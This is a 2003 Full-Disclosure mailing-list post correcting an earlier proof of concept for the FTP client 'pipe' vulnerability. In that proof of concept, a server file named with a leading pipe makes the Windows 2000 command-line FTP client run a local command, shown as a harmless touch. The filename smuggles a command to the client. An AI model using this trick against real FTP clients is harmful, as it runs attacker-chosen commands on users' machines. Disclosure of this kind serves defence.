[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability

From: SChoe (schoeat_private)
Date: Tue Feb 25 2003 - 14:22:21 PST

    Oops.  The "touch" syntax is wrong due to my lack of cut-n-paste skills.

    touch \|touch\ file     <--------Wrong
    touch \|touch\ file.txt <--------Right

    My bad...

    On Tue, 25 Feb 2003, SChoe wrote:

    > Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
    > From: SChoe <schoeat_private>
    > To: bugtraqat_private
    > Cc: full-disclosureat_private
    > Subject: RE: Multiple Vendor FTP pipe Vulnerability
    >
    > Securityfocus has a post on its website regarding this vulnerability in
    > many ftp clients.  I've tested and subsequently validated this issue on
    > many of the platforms mentioned in their advisory.  They mention
    > that the Netscape client on Windows 2000 Professional, but fails to
    > mention that the commandline ftp client included with win2k (server and
    > pro) are also vulnerable.
    >
    > <-----------------------snip----------------------->
    > # Create file on ftp server for download by client.
    > schoe@ftp:/home/ftp$ touch \|touch\ file
    >
    > # Start commandline ftp client on win2k.
    > Microsoft Windows 2000 [Version 5.00.2195]
    > <C> Copyright 1985-2000 Microsoft Corp.
    >
    > C:\ ftp ftp.xxxx.com
    > ftp> get "|touch file.txt"
    > ftp> quit
    > 221 Goodbye.
    >
    > # "C:\file.txt" should now exist.
    > <-----------------------snap----------------------->
    >
    > Multiple Vendor VTP pipe Vulnerability
    > ======================================
    > www.securityfocus.com/bid/396/info

    | Sung J. Choe <schoe[at]oicinc.com>, TICSA |
    | Systems Admin, Facility Security Officer  |
                | Oceanic Imaging Consultants, Inc. |
                | Phone #: (808) 539.3634           |

    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html